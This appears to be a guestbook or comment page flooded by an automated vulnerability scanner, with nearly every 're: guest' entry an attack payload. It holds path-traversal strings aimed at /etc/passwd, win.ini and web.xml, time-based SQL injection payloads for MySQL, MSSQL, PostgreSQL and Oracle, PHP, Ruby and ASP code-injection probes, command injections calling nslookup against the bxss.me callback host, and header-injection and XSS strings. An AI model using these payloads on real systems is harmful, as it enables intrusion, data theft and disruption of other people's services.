unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
${9999576+9999322}
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
'.gethostbyname(lc('hitgm'.'ozctzazmf90a6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(73).chr(111).chr(77).'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
".gethostbyname(lc("hitkk"."stgaebyp0f954.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(89).chr(115).chr(77)."
re: guest
Http://bxss.me/t/fit.txt
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/etc/shells
re: guest
c:/windows/win.ini
re: guest
bxss.me
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
';print(md5(31337));$a='
re: guest
bxss.me/t/xss.html?%00
re: guest
";print(md5(31337));$a="
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(67).concat(106).concat(85)+(require"socket"
Socket.gethostbyname("hitlc"+"bejldnwp1bda1.bxss.me.")[3].to_s)+"
re: guest
${@print(md5(31337))}
re: guest
'+'A'.concat(70-3).concat(22*4).concat(104).concat(88).concat(118).concat(82)+(require'socket'
Socket.gethostbyname('hitbh'+'xzsmzdppda3ad.bxss.me.')[3].to_s)+'
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
'"
re: guest
<!--
thank you Saito San
re: guest
5unMuhoT
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+297-297-1=0+0+0+1
re: guest
-1 OR 3+297-297-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
8imOX9fO'; waitfor delay '0:0:15' --
re: guest
-5 OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: guest
-5) OR 477=(SELECT 477 FROM PG_SLEEP(15))--
re: guest
-1)) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: guest
zRoyBo1u' OR 366=(SELECT 366 FROM PG_SLEEP(15))--
re: guest
qo8wIy9g') OR 966=(SELECT 966 FROM PG_SLEEP(15))--
re: guest
8ktr4ps3')) OR 300=(SELECT 300 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@XXGwn
re: guest
1ChH0HV7VIO
re: guest
response.write(9451849*9166096)
re: guest
'+response.write(9451849*9166096)+'
re: guest
"+response.write(9451849*9166096)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
%0abcc:074625.67-22073.67.d5462.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22074.67.d5462.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999437+9999535}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
'.gethostbyname(lc('hitdg'.'vqvezwgo9638c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(74).chr(115).chr(82).'
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
)
re: guest
".gethostbyname(lc("hiteb"."duwqavnk50da5.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(84).chr(102).chr(68)."
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
!(()&&!|*|*|
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
/etc/passwd
re: guest
echo hmfztc$()\ xazwcf\nz^xyu||a #' &echo hmfztc$()\ xazwcf\nz^xyu||a #|" &echo hmfztc$()\ xazwcf\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo xuyxyf$()\ ftjqeo\nz^xyu||a #' &echo xuyxyf$()\ ftjqeo\nz^xyu||a #|" &echo xuyxyf$()\ ftjqeo\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo hlixso$()\ uwfudw\nz^xyu||a #' |echo hlixso$()\ uwfudw\nz^xyu||a #|" |echo hlixso$()\ uwfudw\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitanwfzldfpo980fa.bxss.me||perl -e "gethostbyname('hitanwfzldfpo980fa.bxss.me')")
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
"+"A".concat(70-3).concat(22*4).concat(103).concat(67).concat(104).concat(81)+(require"socket"
Socket.gethostbyname("hitka"+"qnobnyri35fe9.bxss.me.")[3].to_s)+"
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
$(nslookup hitoenmtrdlvxaa734.bxss.me||perl -e "gethostbyname('hitoenmtrdlvxaa734.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
'+'A'.concat(70-3).concat(22*4).concat(108).concat(76).concat(98).concat(73)+(require'socket'
Socket.gethostbyname('hitvj'+'usvtdyyi23ce2.bxss.me.')[3].to_s)+'
re: guest
bxss.me/t/xss.html?%00
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup hitzmzzkmakuj93fad.bxss.me&'\"`0&nslookup hitzmzzkmakuj93fad.bxss.me&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
&(nslookup hithamlrgvklw3f5df.bxss.me||perl -e "gethostbyname('hithamlrgvklw3f5df.bxss.me')")&'\"`0&(nslookup hithamlrgvklw3f5df.bxss.me||perl -e "gethostbyname('hithamlrgvklw3f5df.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
';print(md5(31337));$a='
re: guest
/etc/shells
re: guest
|(nslookup hitqzoovdasnbd4a71.bxss.me||perl -e "gethostbyname('hitqzoovdasnbd4a71.bxss.me')")
re: guest
file:///etc/passwd
re: guest
";print(md5(31337));$a="
re: guest
c:/windows/win.ini
re: guest
`(nslookup hitzktzqfxfjn5c30f.bxss.me||perl -e "gethostbyname('hitzktzqfxfjn5c30f.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
${@print(md5(31337))}
re: guest
bxss.me
re: guest
;(nslookup hitouprpekzjf302dc.bxss.me||perl -e "gethostbyname('hitouprpekzjf302dc.bxss.me')")|(nslookup hitouprpekzjf302dc.bxss.me||perl -e "gethostbyname('hitouprpekzjf302dc.bxss.me')")&(nslookup hitouprpekzjf302dc.bxss.me||perl -e "gethostbyname('hitouprpekzjf302dc.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
${@print(md5(31337))}\
re: guest
'"
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'.print(md5(31337)).'
re: guest
<!--
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+162-162-1=0+0+0+1 --
re: guest
-1 OR 3+162-162-1=0+0+0+1 --
re: guest
-1 OR 2+502-502-1=0+0+0+1
re: guest
-1 OR 3+502-502-1=0+0+0+1
re: guest
-1' OR 2+544-544-1=0+0+0+1 --
re: guest
-1' OR 3+544-544-1=0+0+0+1 --
re: guest
-1' OR 2+733-733-1=0+0+0+1 or 'u3DI8Wd5'='
re: guest
-1' OR 3+733-733-1=0+0+0+1 or 'u3DI8Wd5'='
re: guest
-1" OR 2+909-909-1=0+0+0+1 --
re: guest
-1" OR 3+909-909-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
cyOVn3EP'; waitfor delay '0:0:15' --
re: guest
-5 OR 231=(SELECT 231 FROM PG_SLEEP(15))--
re: guest
-5) OR 617=(SELECT 617 FROM PG_SLEEP(15))--
re: guest
-1)) OR 904=(SELECT 904 FROM PG_SLEEP(15))--
re: guest
svqw6mdC' OR 285=(SELECT 285 FROM PG_SLEEP(15))--
re: guest
wHqkIzVB') OR 576=(SELECT 576 FROM PG_SLEEP(15))--
re: guest
4YLd01JD')) OR 857=(SELECT 857 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@vgNmA